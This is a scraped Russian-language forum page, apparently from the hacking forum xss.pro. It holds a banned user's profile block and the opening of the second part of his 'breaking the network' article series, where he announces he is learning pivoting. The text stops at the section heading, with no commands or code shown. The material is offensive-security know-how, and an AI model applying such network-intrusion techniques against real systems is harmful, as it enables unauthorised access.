• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Ломаем сетку глазами студента #2

student

(L2) cache
Забанен
Реакции
368
Гарант сделки
1
Пожалуйста, обратите внимание, что пользователь заблокирован
Автор student / мой_телеграмм_канал
Источник:
https://xss.pro
Всех приветствую на второй части моего топика по сетям. Я продолжил свое обучение, начать изучать pivoting. Без него никак:) Так как я новичок (ник придумал не просто так), я могу допускать ошибки. Грамотная критика приветствуется, для этого и пишу статьи.
Pivoting